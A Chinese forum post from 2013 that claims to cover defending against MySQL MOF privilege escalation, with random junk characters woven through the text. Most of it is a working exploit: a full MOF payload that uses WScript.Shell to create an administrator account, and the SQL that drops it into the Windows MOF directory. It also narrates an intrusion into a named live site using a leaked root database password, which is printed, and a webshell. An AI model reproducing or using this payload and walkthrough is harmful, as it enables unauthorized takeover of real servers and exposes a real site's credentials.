Mysql mof扩展漏洞防范方法
S- `+ `' }2 X( p2 J
) |( V8 B$ ]( |3 C* \9 a( O网上公开的一些利用代码:
, I& I8 n' r5 w5 c3 t+ m0 E8 B! |5 L# h
: q; h) i4 v1 ^1 C, _# a; g#pragma namespace(“\\\\.\\root\\subscription”)9 C! K) Z3 }8 @" t% H2 l* q
1 A. |) K# D/ [7 C
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };& b6 E# ]' j- W; H& Z" C# e5 z9 I) o
; x, z4 b+ a4 W) Z6 ~
, g- l k H" W" ?2 c& b' ?* d- s- ?* m5 B( a
2 @; m2 f/ X8 L; D. O& J b7 D- U, Z. g! K7 Q+ H8 g
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;; D% f4 b7 `: O% M* v
从上面代码来看得出解决办法:# G, ]0 Y% k' d8 U) R( a% \
0 Q' X) t+ ?" y ^, q1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数" I0 E, L$ {, o, R0 o S7 }& D
/ b: J0 F: _* E
2、禁止使用”WScript.Shel”组件( r6 b0 _! g2 N5 x9 P
0 r' x7 h; t* }% g' B3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER2 l) O/ B7 z% O, H& M! u; I
9 e! F5 j; ~) E I! h: Y- `7 u
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
) o# X# Y$ Q. i! e
" Q) @ @1 y; z s: L( {' m6 B8 V事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
3 w2 \4 a- B! }1 B2 ~: T' H' h- H) h e+ p* x: E+ [& q& D) R
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容# d$ b8 g2 Q( h- z* c+ E
% y- p# L9 |2 g- o
看懂了后就开始练手吧# ]" M+ m5 ` u! p8 D% g* `+ s
! f' t: f6 l8 [; a, @ f* \
http://www.webbmw.com/config/config_ucenter.php 一句话 a+ Y% b+ C/ _7 O; O6 g" T& d
6 @! t t" z" z
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。1 p) Y$ w* M8 o1 R1 J' P$ b
; v6 |' X( u" a+ L) j于是直接用菜刀开搞
' A+ K6 F- j! G; |2 N$ ?5 F) D( E1 a6 O8 v; b$ ~/ P
上马先
" Z, }/ O" r. [* v m+ q. K* l7 q: `6 }6 w |
既然有了那些账号 之类的 于是我们就执行吧…….
% ~6 v9 O K! Y
2 u& a2 I0 q. I5 L小小的说下
" X6 i% I6 m7 N, E( ?& n6 h+ u6 ?* F. N' A/ h
在这里第1次执行未成功 原因未知
" B. D# w& I8 h! Z% r0 }. w' a% s* A; q4 Y8 a4 [
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
. }+ ~4 Q' f6 ]! p
, f: ?+ N* r/ V; w#pragma namespace(“\\\\.\\root\\subscription”)& Y& W% G$ |- q2 t& @$ J" A
3 Z: t" K* }2 y
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
: ~( ^) ]) D. `: X6 r" v. n) q
+ ?( t5 K( U: O& X我是将文件放到C:\WINDOWS\temp\1.mof
. p- b2 Q* R8 m
( B( g* w" U* e, T, I) e W所以我们就改下执行的代码
; S* }4 ?: N! S5 o9 W
5 r! p0 {" P4 m1 ~+ Rselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;$ W' Z5 j+ k4 s' F1 [1 m0 c
* d. A0 b* [2 M1 s" f& k+ Q% R- ~
0 o. I. a% T; x
& S. G' @ z+ S, r* p6 X1 k3 s但是 你会发现账号还是没有躺在那里。。
9 C" ?) `1 G& v' L8 U( k) R1 S- ?! t; n! L" `. l: Y3 b
于是我就感觉蛋疼4 s# W- E1 T1 U5 C
/ s# \4 {5 X5 l0 p* x& L* D8 Y) B就去一个一个去执行 但是执行到第2个 mysql时就成功了………
$ j1 D K4 ], K
+ H' V* E# A& @& Z: w; {) ?, } V, `& z* B5 N
% N0 k# C M1 w: f2 U: c但是其他库均不成功…
) I% F. K: e) V2 _. m& y
% W) M6 W3 ~4 G3 n* G3 i我就很费解呀 到底为什么不成功求大牛解答…) h3 a+ P! k6 P2 n% h
+ _ W' e6 K8 `
+ N1 [1 @3 H1 I& S% |0 d2 g& V
, r: f @ J. E |
发表于 2013-1-4 19:49:49
收藏
支持
反对